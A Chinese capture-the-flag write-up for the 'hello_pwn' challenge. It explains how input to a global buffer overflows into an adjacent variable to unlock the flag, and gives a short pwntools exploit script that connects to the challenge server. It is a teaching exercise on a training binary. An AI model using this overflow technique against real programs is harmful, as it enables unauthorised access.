攻防世界-pwn hello_pwn(地址溢出)

在这里插入图片描述

0x01 检查文件

在这里插入图片描述

  • 64位elf 可执行文件
  • 无栈保护
  • 无PIE
     

0x02 运行程序

在这里插入图片描述
程序只有一个输入
 

0x03 IDA静态分析

主函数:

在这里插入图片描述

sub_400686()

在这里插入图片描述
可以发现只要dword_60106C == 1853186401就可以拿到flag
 
在这里插入图片描述
继续分析发现程序输入的值存储在unk_601068之中,而dword_60106C就在unk_601068之后,并且两个变量都存在于bss段(全局变量段),则可以考虑用unk_601068的输入溢出来更改dword_60106C的值。

0x04 exp

from pwn import *
p = remote('111.198.29.45', 34428)

p.recvuntil("lets get helloworld for bof")
p.sendline("a" * 4 + p64(1853186401))

p.interactive()

取得flag
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值